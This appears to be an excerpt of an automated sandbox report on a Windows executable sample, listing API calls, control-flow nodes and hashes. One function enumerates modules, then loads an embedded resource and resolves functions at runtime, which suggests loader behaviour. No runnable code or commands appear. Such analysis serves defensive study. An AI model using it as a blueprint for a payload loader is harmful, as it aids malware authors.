12840->12835 12840->12839 12842 417bcb 12841->12842 12842->12835 12843 417bd4 WideCharToMultiByte 12842->12843 12843->12835 12844 417be6 12843->12844 12845 40b6b5 63 API calls 12844->12845 12845->12835 12849 41a354 12846->12849 12850 41a36d 12849->12850 12851 41a125 87 API calls 12850->12851 12852 416f65 12851->12852 12852->12817 12854 4170a2 LCMapStringW 12853->12854 12856 4170bd 12853->12856 12855 4170c5 GetLastError 12854->12855 12854->12856 12855->12856 12857 4172bb 12856->12857 12860 417117 12856->12860 12861 417a20 87 API calls 12857->12861 12858 4172b2 12863 40ce09 5 API calls 12858->12863 12859 417130 MultiByteToWideChar 12859->12858 12870 41715d 12859->12870 12860->12858 12860->12859 12862 4172e3 12861->12862 12862->12858 12865 4173d7 LCMapStringA 12862->12865 12866 4172fc 12862->12866 12864 413efa 12863->12864 12864->12775 12867 417333 12865->12867 12868 417a69 70 API calls 12866->12868 12871 4173fe 12867->12871 12876 40b6b5 63 API calls 12867->12876 12873 41730e 12868->12873 12869 4171ae MultiByteToWideChar 12874 4171c7 LCMapStringW 12869->12874 12875 4172a9 12869->12875 12872 40b84d 63 API calls 12870->12872 12880 417176 12870->12880 12871->12858 12882 40b6b5 63 API calls 12871->12882 12872->12880 12873->12858 12877 417318 LCMapStringA 12873->12877 12874->12875 12879 4171e8 12874->12879 12878 4147ae 63 API calls 12875->12878 12876->12871 12877->12867 12885 41733a 12877->12885 12878->12858 12881 4171f1 12879->12881 12884 41721a 12879->12884 12880->12858 12880->12869 12881->12875 12883 417203 LCMapStringW 12881->12883 12882->12858 12883->12875 12890 417235 12884->12890 12892 40b84d 63 API calls 12884->12892 12887 40b84d 63 API calls 12885->12887 12891 41734b 12885->12891 12886 417269 LCMapStringW 12888 417281 WideCharToMultiByte 12886->12888 12889 4172a3 12886->12889 12887->12891 12888->12889 12893 4147ae 63 API calls 12889->12893 12890->12875 12890->12886 12891->12867 12894 417389 LCMapStringA 12891->12894 12892->12890 12893->12875 12896 4173a5 

Control-flow Graph

control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->32 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 79 401da0-401da2 76->79 80 401d86-401d88 76->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 #8 call 401870 #8 call 4018d0 104->106 114 4022c3-40232a call 4018d0 #15 #23 call 40b350 #24 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 #16 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 #411 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 #9 * 2 call 4019a0 142->144 143->144 146 40241c-40242c #9 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNELBASE(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 693451461-2962942730
• Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Control-flow Graph

control_flow_graph 152 40e7c3-40e7d5 GetModuleHandleW 153 40e7d7-40e7e5 GetProcAddress 152->153 154 40e7ec-40e7ed 152->154 153->154 155 40e7e7-40e7ea CorExitProcess 153->155 155->154
APIs
• GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
• CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: AddressExitHandleModuleProcProcess
• String ID: CorExitProcess$mscoree.dll
• API String ID: 75539706-1276376045
• Opcode ID: 5704aca5f5ecdaa3d57f3352e77ea2b8a015caad99495bbcc1e51de28377031d
• Instruction ID: 13dbb3e6ef43035a159a1267b6351ab0e26cdcbf0334b58bc2f3653a625ca4b4
• Opcode Fuzzy Hash: 5704aca5f5ecdaa3d57f3352e77ea2b8a015caad99495bbcc1e51de28377031d
• Instruction Fuzzy Hash: 69D0A9383402042B8B202FB29C08A8BBE8CCD88B403020432B61CE22A2CB38C81184AD

Control-flow Graph (rendered graph not reproduced)
APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
• API ID: ByteCharMultiWide$ErrorLastlstrlen

Control-flow Graph (rendered graph not reproduced)
APIs
• GetCommandLineA.KERNEL32(?,?,?,?,?,?,004211C0,00000014), ref: 0040CC72
• API ID: CommandLine

Control-flow Graph (rendered graph not reproduced)
APIs
• RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• API ID: AllocateHeap

Control-flow Graph (rendered graph not reproduced)
• API ID: AllocString

Control-flow Graph (rendered graph not reproduced)
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
• API ID: CreateHeap

Control-flow Graph (rendered graph not reproduced)
APIs
  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
• ExitProcess.KERNEL32 ref: 0040E7FF
• API ID: ExitProcess$AddressHandleModuleProc
APIs
• IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 0040E6F8
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 0040E702
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 0040E70F
• GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 0040E72A
• TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 0040E731
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00417066
• UnhandledExceptionFilter.KERNEL32(?), ref: 00417073
  • Part of subcall function 0040EAA2: GetModuleFileNameA.KERNEL32(00000000,00423661,00000104), ref: 0040EB45
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$FileModuleName
• String ID:
• API String ID: 787209826-0
APIs
• GetProcessHeap.KERNEL32 ref: 0040ADD0
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
Yara matches
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
Yara matches
Similarity
• API ID:
• String ID: 08A
• API String ID: 0-3446600063

Control-flow Graph (function starting at 41087e; graph omitted, nodes were marked Executed / Not Executed)
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00410888
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004108AF
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004108BC
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004108C9
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004108D6
• TlsAlloc.KERNEL32 ref: 00410926
• TlsSetValue.KERNEL32(00000000), ref: 00410941
• GetCurrentThreadId.KERNEL32 ref: 004109F0
  • Part of subcall function 0040E76A: Sleep.KERNEL32(000003E8,00000000,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E776
  • Part of subcall function 0040E76A: GetModuleHandleW.KERNEL32(00000001,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E77F
  • Part of subcall function 00410598: TlsFree.KERNEL32(FFFFFFFF,00410A06), ref: 004105C3
Strings
Yara matches
Similarity
• API ID: AddressProc$HandleModule$AllocCurrentFreeSleepThreadValue
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 3443574016-3819984048

Control-flow Graph (function starting at 413b7e; graph omitted, nodes were marked Executed / Not Executed)
APIs
• LoadLibraryA.KERNEL32(USER32.DLL,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library), ref: 00413BA6
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00413BC2
  • Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
  • Part of subcall function 0041046E: TlsGetValue.KERNEL32(FFFFFFFF,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00413BDF
  • Part of subcall function 0041046E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104AD
  • Part of subcall function 0041046E: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004104C8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00413BF4
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00413C09
• GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00413C21
Strings
Yara matches
Similarity
• API ID: AddressProc$Value$HandleLibraryLoadModule
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
• API String ID: 2739679353-232180764

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)

APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,0041219E,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000), ref: 004170B3
• GetLastError.KERNEL32(?,00004000,7FFFFFFF,00000000,?,?,00000000,00004000,00000000,00000000,?,0041219E,?,00000000,00000000), ref: 004170C5
• MultiByteToWideChar.KERNEL32(0041219E,00000000,?,?,00000000,00000000,0041219E,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000), ref: 00417151
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00004000,7FFFFFFF,00000000,?,?,00000000,00004000,00000000,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00004000,7FFFFFFF,00000000,?,?,00000000,00004000,00000000,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,0041219E,00000100,00000000,?,?,?,?), ref: 0041732A
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,0041219E,00000100,00000000,?), ref: 0041739C
• LCMapStringA.KERNEL32(?,?,?,?,00000000,00000100,0041219E,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000), ref: 004173E9
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: String$ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1775797328-0
• Opcode ID: a16583e9d2d5c9a4990361f5dab3c24c1027fc4bfe8588b4c27167f0f9a1fd6d
• Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
• Opcode Fuzzy Hash: a16583e9d2d5c9a4990361f5dab3c24c1027fc4bfe8588b4c27167f0f9a1fd6d
• Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
APIs
• InterlockedDecrement.KERNEL32(SA), ref: 0041467B
• InterlockedDecrement.KERNEL32(?), ref: 00414688
• InterlockedDecrement.KERNEL32(?), ref: 00414695
• InterlockedDecrement.KERNEL32(?), ref: 004146A2
• InterlockedDecrement.KERNEL32(?), ref: 004146AF
• InterlockedDecrement.KERNEL32(?), ref: 004146CB
• InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
• InterlockedDecrement.KERNEL32(?), ref: 004146F1
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: DecrementInterlocked
• String ID: SA
• API String ID: 3448037634-1954343693
• Opcode ID: 477eb8f2978c6dba48184111582f2e4fe97a9e13532dd84427a4bead277ee740
• Instruction ID: 9a57645e9d711957f0b1177cc73d8bf7343520b358408f524570bf87b47795ee
• Opcode Fuzzy Hash: 477eb8f2978c6dba48184111582f2e4fe97a9e13532dd84427a4bead277ee740
• Instruction Fuzzy Hash: 77110C71B00719A7DB109F69CC84B97BBACAF85758F084527A818D7240DB7CE8918BA8
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00410710,00000000,00000000,?,00000001,0040BFC6,0040B72C), ref: 004105E7
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041061B
• GetProcAddress.KERNEL32(?,DecodePointer), ref: 0041062B
• InterlockedIncrement.KERNEL32(?), ref: 0041065A
  • Part of subcall function 0040E76A: Sleep.KERNEL32(000003E8,00000000,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E776
  • Part of subcall function 0040E76A: GetModuleHandleW.KERNEL32(00000001,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E77F
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc$IncrementInterlockedSleep
• String ID: @.B$DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 3998264955-2889590918
• Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
• Instruction ID: ea0ea8473cec590b50870dd3b4b8be5e3c50d09318c2f51e843d2d197a1947a1
• Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
• Instruction Fuzzy Hash: F4119071940701EED720AF76D90179EBBE0AF44314F10892FE499A72A1CBB89A958F5C
APIs
• CompareStringW.KERNEL32(00000000,00000000,00420398,00000001,00420398,00000001), ref: 00414825
• GetLastError.KERNEL32 ref: 0041483B
• GetCPInfo.KERNEL32(?,?), ref: 004148ED
• MultiByteToWideChar.KERNEL32(?,00000009,?,000000FF,00000000,00000000), ref: 00414973
• MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,00000000,00000000,?,000000FF,00000000,00000000), ref: 004149E8
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00414A01
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00414A60
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00414A74
• CompareStringA.KERNEL32(?,?,?,000000FF,?,?), ref: 00414B2E
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$CompareString$AllocateErrorHeapInfoLast
• String ID:
• API String ID: 195966823-0
• Opcode ID: 86869baf4baed15a7717e25d52880a7f60df34c00b5b11a5786178dfb2da1398
• Instruction ID: 56dbbc9a29ee3c2731aeb7529e1567d7181306e595e99f99bac017c5bf1c7a0e
• Opcode Fuzzy Hash: 86869baf4baed15a7717e25d52880a7f60df34c00b5b11a5786178dfb2da1398
• Instruction Fuzzy Hash: BDB1D475A002469FDF219F60CC81AEF7BB6EFC5354F24402BF911A6291D73989D2CB98
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 004128B0
• GetLastError.KERNEL32 ref: 004128C4
• GetEnvironmentStringsW.KERNEL32 ref: 004128EB
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00412925
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00412948
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041295E
• GetEnvironmentStrings.KERNEL32 ref: 00412971
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004129A3
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004129BC
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 4109468225-0
• Opcode ID: c9bcb802a9135f080db95b40d64ad5aa70a43d39f8a133c566e31837109afe9d
• Instruction ID: 6b1780b173e0c76c547e1634e6262843354cab8c9edf2f553bb01521c5479492
• Opcode Fuzzy Hash: c9bcb802a9135f080db95b40d64ad5aa70a43d39f8a133c566e31837109afe9d
• Instruction Fuzzy Hash: 3B31E2B2A10119BFCB207BB89E848EF7B7CEB59344B25043BE142D3200D6B84DD2976D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00423661,00000104), ref: 0040EB45
• GetStdHandle.KERNEL32(000000F4,00021920,00000001,00000000,00000003,00000003,?,0040EC79,000000FC,0040B875,?,00411C86,00000001,00000001,00000001), ref: 0040EC18
• WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,0040EC79,000000FC,0040B875,?,00411C86,00000001,00000001,00000001,?,0040D66A), ref: 0040EC42
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
APIs
• InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
• InterlockedIncrement.KERNEL32(?), ref: 004145F1
• InterlockedIncrement.KERNEL32(?), ref: 004145FE
• InterlockedIncrement.KERNEL32(?), ref: 0041460B
• InterlockedIncrement.KERNEL32(?), ref: 00414618
• InterlockedIncrement.KERNEL32(?), ref: 00414634
• InterlockedIncrement.KERNEL32(?), ref: 00414644
• InterlockedIncrement.KERNEL32(?), ref: 0041465A
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: IncrementInterlocked
• String ID:
• API String ID: 3508698243-0
APIs
• GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,0041219E,?,?,?,00417655,00000001,?,00000000,?,?,?), ref: 00417AB4
• GetCPInfo.KERNEL32(?,00000001,?,00417655,00000001,?), ref: 00417ACD
• MultiByteToWideChar.KERNEL32(?,00000001,?,00417655,00000000,00000000,?,00417655,00000001,?,00000000,?,?,?,?,00000000), ref: 00417B2B
• MultiByteToWideChar.KERNEL32(?,00000001,?,00417655,?,00000000,?,?,?,?,?,?,?,00417655,00000001,?), ref: 00417B7A
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417B95
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417BBB
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417BE0
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$Info
• String ID:
• API String ID: 1775632426-0
APIs
• TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
